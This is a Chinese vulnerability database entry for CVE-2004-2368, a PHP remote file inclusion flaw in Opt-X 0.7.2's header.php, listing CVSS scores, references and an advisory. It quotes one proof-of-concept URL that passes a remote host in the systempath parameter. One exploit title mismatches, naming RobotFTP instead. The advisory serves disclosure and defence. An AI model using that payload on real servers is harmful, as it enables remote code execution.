CVE-2004-2368
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2013-07-22 00:33:11
NMCOE    

[原文]PHP remote file inclusion vulnerability in header.php in Opt-X 0.7.2 allows remote attackers to execute arbitrary PHP code via the systempath parameter.


[CNNVD]Opt-X header.php远程文件列入漏洞(CNNVD-200412-1007)

        Opt-X 0.7.2版本中header.php存在PHP远程文件列入漏洞。远程攻击者借助systempath参数执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2368
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2368
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1007
(官方数据源) CNNVD

- 其它链接及资源

http://www.opt-x.org/index.php
(PATCH)  CONFIRM  http://www.opt-x.org/index.php
http://xforce.iss.net/xforce/xfdb/15296
(UNKNOWN)  XF  optx-header-file-include(15296)
http://www.zone-h.org/en/advisories/read/id=4036/
(UNKNOWN)  MISC  http://www.zone-h.org/en/advisories/read/id=4036/
http://www.securityfocus.com/bid/9732
(UNKNOWN)  BID  9732

- 漏洞信息

Opt-X header.php远程文件列入漏洞
高危 输入验证
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        Opt-X 0.7.2版本中header.php存在PHP远程文件列入漏洞。远程攻击者借助systempath参数执行任意PHP代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (23750)

RobotFTP Server 1.0/2.0 Remote Pre-authenticated Command Denial Of Service Vulnerability (EDBID:23750)
php webapps
2004-02-24 Verified
0 Zone-h Security Team
N/A [点击下载]
source: http://www.securityfocus.com/bid/9732/info

It has been reported that Opt-X may be prone to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem reportedly exists because remote users may influence the 'systempath' variable in the header.php module.

Opt-X version 0.7.2 has been reported to be prone to this issue.

http://www.example.com/path_of_optx/includes/header.php?systempath=http://www.example.com/		

- 漏洞信息

4036
Opt-X Arbitrary File Inclusion

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-02-24 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站